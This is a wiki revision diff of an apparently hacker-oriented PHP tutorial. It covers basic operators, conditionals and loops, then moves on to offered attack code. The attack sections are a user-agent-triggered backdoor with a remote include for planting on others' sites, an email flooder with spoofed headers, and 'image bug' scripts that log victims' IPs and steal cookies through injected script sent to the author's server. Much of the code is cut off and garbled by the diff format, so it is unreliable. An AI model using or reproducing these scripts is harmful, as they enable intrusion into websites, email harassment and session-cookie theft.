tools:php
Differences
This shows you the differences between two versions of the page.
Both sides previous revisionPrevious revisionNext revision | Previous revision | ||
tools:php [2024/06/03 03:28] – [Arithmetic] Humphrey Boa-Gart | tools:php [2024/08/06 05:48] (current) – external edit 127.0.0.1 | ||
---|---|---|---|
Line 1: | Line 1: | ||
- | {{wst> | + | {{wst> |
====== PHP ====== | ====== PHP ====== | ||
Line 101: | Line 101: | ||
==== Assignment ==== | ==== Assignment ==== | ||
+ | += ex: n+=7, or N equals N+7 | ||
+ | -= | ||
+ | *= | ||
+ | /= | ||
+ | %= | ||
+ | .= | ||
+ | = | ||
==== Logical ==== | ==== Logical ==== | ||
+ | && , AND ex: if (($a>0) && ($a< | ||
+ | || , OR ex: if (($a==0)||($a==1)){ | ||
+ | ! , NOT ex: if ($a != 2) { | ||
==== Comparison ==== | ==== Comparison ==== | ||
+ | < Less than | ||
+ | > Greater than | ||
+ | == Equal to | ||
+ | != Not equal | ||
+ | === Identical | ||
+ | !== Not identical | ||
+ | <= Less than or equal to | ||
+ | >= Greater than or equal to | ||
==== Conditional statements and loops ==== | ==== Conditional statements and loops ==== | ||
+ | Now you have a basic understanding of printing things, now it's time to start something else. We will explore loops and conditional statements. Loops will pretty much do something a certain amount of times and conditional statements control what the program does if a condition is fulfilled or not. | ||
==== Conditional statements ==== | ==== Conditional statements ==== | ||
+ | Well, it's basically just if and switch, but the former is pretty useful. You have to know this one. | ||
==== If ==== | ==== If ==== | ||
+ | This essentially checks whether or not a condition is true. | ||
+ | |||
+ | <?php | ||
+ | $willdo = true; | ||
+ | if($willdo == true){ | ||
+ | echo " | ||
+ | } | ||
+ | ?> | ||
+ | | ||
+ | An else statement is an addition to an if statement which allows for another condition. If there' | ||
+ | |||
+ | <?php | ||
+ | $wontdo = false; | ||
+ | if($wontdo == true){ | ||
+ | echo " | ||
+ | } else { | ||
+ | echo " | ||
+ | } | ||
+ | ?> | ||
+ | |||
+ | Else if statements allow for multiple conditions, if and only if the first condition before it was false. | ||
+ | |||
+ | <?php | ||
+ | $maydo = 99; | ||
+ | $maynotdo = false; | ||
+ | if($maynotdo == true){ | ||
+ | echo " | ||
+ | } elseif ($maydo == 99){ | ||
+ | echo "did anyway"; | ||
+ | } else { | ||
+ | echo " | ||
+ | } | ||
+ | ?> | ||
+ | |||
+ | Also: | ||
+ | |||
+ | - Conditions in parentheses just have to be true. You don't have to use an == or != if it's a boolean value (true/ | ||
+ | - There are logical operators like and (&& | ||
+ | - a ! behind it means it's false, so if $dick is true, !$dick is false, and vice versa if $dick was false. | ||
==== Switch ==== | ==== Switch ==== | ||
+ | A substitute to a whole bunch of elseifs. It tests if a given value is equal to something. Cases can be any value. There' | ||
+ | |||
+ | <?php | ||
+ | switch ($value) { | ||
+ | case false: | ||
+ | echo "value is 0"; | ||
+ | | ||
+ | case 17: | ||
+ | echo "value is 1"; | ||
+ | | ||
+ | case " | ||
+ | echo "value is pigdog"; | ||
+ | | ||
+ | case NULL: | ||
+ | echo "value is null"; | ||
+ | | ||
+ | default: | ||
+ | echo "value is something else other than 0, 1, pigdog, or null."; | ||
+ | | ||
+ | } | ||
+ | ?> | ||
===== Loops ===== | ===== Loops ===== | ||
+ | There are three main loops: for loops, foreach loops, and while/ | ||
==== For loops ==== | ==== For loops ==== | ||
+ | For this loop you simply declare a variable as a counter, and the loop will occur as many times as you want it until the counter reaches a certain number. | ||
+ | |||
+ | <?php | ||
+ | $counter = 0; | ||
+ | for($counter = 0; $counter < 6; $counter++) | ||
+ | { | ||
+ | echo "HAI | ||
+ | "; | ||
+ | } | ||
+ | ?> | ||
+ | |||
+ | What this code does is take the variable we made, and use it as a counter. As long as the variable, $counter, is less than 6, the ++ operator will add one to the value of $counter and then the code within the curly braces {} will be executed. So the output of this code is: | ||
+ | |||
+ | HAI | ||
+ | |||
+ | HAI | ||
+ | |||
+ | HAI | ||
+ | |||
+ | HAI | ||
+ | |||
+ | HAI | ||
+ | |||
+ | Some notes about this code: | ||
+ | |||
+ | 1. The ++ operator adds one to a variable, and can be used on any variable. This is an example of a unary operator. You could also use -- to subtract one from the variable. 2. Notice that the for loop did NOT end in a semicolon. This is intended. Loops and conditionals don't need a semicolon. But the code inside of the curly braces DOES need the semicolons. | ||
==== Foreach loops ==== | ==== Foreach loops ==== | ||
+ | This statement essentially sets the number of times something' | ||
+ | |||
+ | <?php | ||
+ | $lolarray = array(" | ||
+ | foreach($lolarray as $value){ | ||
+ | echo $value . "</ | ||
+ | } | ||
+ | ?> | ||
+ | |||
+ | This code will output: | ||
+ | |||
+ | lol | ||
+ | |||
+ | rofl | ||
+ | |||
+ | lmao | ||
+ | |||
+ | Also: | ||
+ | |||
+ | 1. you might want to unset(), or destroy the variable you use. You never know. 2. foreach($array as $key => $value) will assign $key as a key, but it's basically the same. | ||
==== While loops ==== | ==== While loops ==== | ||
+ | This is probably the simplest loop there is. As long as a condition is true, this loop will run. If the condition is false or if break is used it'll stop the loop. Be careful not to create an infinite loop or your internets will explode; also, if the conditions aren't met or defined the code inside won't run. | ||
+ | |||
+ | Like this. | ||
+ | |||
+ | <?php | ||
+ | $fuckme = false; | ||
+ | while($fuckme){ /* or while($fuckme == true) */ | ||
+ | echo "This loop won't run.\n"; | ||
+ | } | ||
+ | |||
+ | But this will run. | ||
+ | |||
+ | $fucku = 17; | ||
+ | while($fucku == 17){ | ||
+ | echo "This loop will run. Infinitely.\n"; | ||
+ | } | ||
+ | ?> | ||
+ | |||
+ | This one will run too, but it'll stop after a while. (you would use a for loop in this position though) | ||
+ | |||
+ | <?php | ||
+ | $lolwut = 0 | ||
+ | while($lolwut <= 5){ | ||
+ | | ||
+ | echo "This will run for ". $lolkay ." more times after this..\n"; | ||
+ | | ||
+ | } | ||
+ | echo " | ||
+ | ?> | ||
+ | |||
+ | This will produce: | ||
+ | |||
+ | This will run for 5 more times. | ||
+ | |||
+ | This will run for 4 more times. | ||
+ | |||
+ | This will run for 3 more times. | ||
+ | |||
+ | This will run for 2 more times. | ||
+ | |||
+ | This will run for 1 more times. | ||
+ | |||
+ | This will run for 0 more times. | ||
+ | |||
+ | Done. | ||
+ | |||
+ | This isn't as useful as you imagine though. | ||
==== Do-while loops ==== | ==== Do-while loops ==== | ||
+ | This does the same thing as a while loop but it checks the condition after the action' | ||
+ | |||
+ | <?php | ||
+ | $doit = false; | ||
+ | do { | ||
+ | echo "Did it anyway, lol"; | ||
+ | } while ($doit); | ||
+ | ?> | ||
+ | |||
+ | This is useful if you want the code run at least once but not necessarily further times. | ||
==== Simple Backdoor in PHP ==== | ==== Simple Backdoor in PHP ==== | ||
+ | Because many of you want to go straight to the uber hax, I'll add this little bit in. Please stop reading and Google up the following if you don't know this already: | ||
+ | |||
+ | 1. Basic Understanding of PHP 2. Remote File Inclusion 3. Basic web hacking 4. Web shell (c99, x2300 Locus7s, r57, etc.) 5. User Agents and how to change them | ||
+ | |||
+ | Now that you have an idea of what these are, here is how to backdoor a page. If you have access to someone' | ||
+ | |||
+ | <?php | ||
+ | $blackdoor = $_SERVER[' | ||
+ | if($blackdoor == "PUT YOUR USER AGENT HERE) | ||
+ | | ||
+ | @include(' | ||
+ | | ||
+ | ?> | ||
==== Email flooder in PHP ==== | ==== Email flooder in PHP ==== | ||
- | ===== Image bugs ===== | + | If you want to just copy this and run it off a server, go ahead. Unfortunately most free PHP hosts don't allow you to send mail, but I guess you can run it off your localhost. You must have access to the sendmail binary on your system to run; it's just a matter of configuring php.ini, which I won't go into now. |
+ | |||
+ | You need to have: | ||
+ | |||
+ | 1. a server 2. basic knowledge of PHP 3. knowledge on how to install/ | ||
+ | |||
+ | <?php | ||
+ | | ||
+ | // define number of spam cycles | ||
+ | |||
+ | | ||
+ | // this is the message | ||
+ | |||
+ | | ||
+ | // define recipient | ||
+ | |||
+ | $rofl = $_POST[" | ||
+ | // your message | ||
+ | |||
+ | | ||
+ | $sender = $_POST[" | ||
+ | $header = ' | ||
+ | | ||
+ | From: <' . $sender . '>'; | ||
+ | |||
+ | return($header); | ||
+ | } | ||
+ | // spoofed header. i found it easier to write it this way. | ||
+ | |||
+ | | ||
+ | for($i = 1; $i <= $spam; $i++){ | ||
+ | |||
+ | | ||
+ | |||
+ | mail($_POST[" | ||
+ | |||
+ | } // (the second for loop) defines one cycle | ||
+ | |||
+ | echo "Done $i loops of $spam | ||
+ | "; // | ||
+ | |||
+ | } | ||
+ | echo " | ||
+ | } | ||
+ | else { | ||
+ | /* if the form isn't filled out show it. also, mess around with this part any way you like. */ | ||
+ | ?> | ||
+ | <form method=" | ||
+ | |||
+ | | ||
+ | |||
+ | | ||
+ | |||
+ | | ||
+ | |||
+ | | ||
+ | |||
+ | | ||
+ | |||
+ | | ||
+ | |||
+ | < | ||
+ | |||
+ | </ | ||
+ | <?php | ||
+ | } | ||
+ | ?> | ||
+ | |||
+ | ===== Image Bugs ===== | ||
+ | |||
+ | Pretty fucking simple, really. You insert the following into an e-mail or something: | ||
+ | |||
+ | c | ||
+ | |||
+ | Then in iplulz.php on your server (or whatever you call it), put this code: | ||
+ | |||
+ | //PROTIP: Make a directory on your server called image.png or any image name, then save the code as index.php in the directory.// | ||
+ | |||
+ | <?PHP | ||
+ | $the_image = " | ||
+ | $ip_lister = fopen(" | ||
+ | fwrite($ip_lister, | ||
+ | fclose($ip_lister); | ||
+ | if (!strncasecmp(substr($the_image, | ||
+ | $image_mime = " | ||
+ | else $image_mime = substr($the_image, | ||
+ | header(" | ||
+ | echo file_get_contents($the_image); | ||
+ | ?> | ||
+ | |||
+ | User gets the image, you get their IP added to a list. EVERYONE WINS | ||
+ | |||
+ | Also, can steel cookies in dat way: | ||
+ | |||
+ | <?PHP | ||
+ | $the_image = " | ||
+ | $ip_lister | ||
+ | fwrite($ip_lister, | ||
+ | fclose($ip_lister); | ||
+ | if (!strncasecmp(substr($the_image, | ||
+ | $image_mime | ||
+ | else $image_mime | ||
+ | header(" | ||
+ | echo file_get_contents($the_image); | ||
+ | ?> | ||
+ | |||
+ | And in email or whatevastuff put | ||
+ | |||
+ | < | ||
+ | document.write("< | ||
+ | ') | ||
+ | </ | ||
- | {{tag> | + | {{tag> |
tools/php.1717385288.txt.gz · Last modified: 2024/08/06 05:52 (external edit)
Find this page online at: https://bestpoint.institute/tools/php
Find this page online at: https://bestpoint.institute/tools/php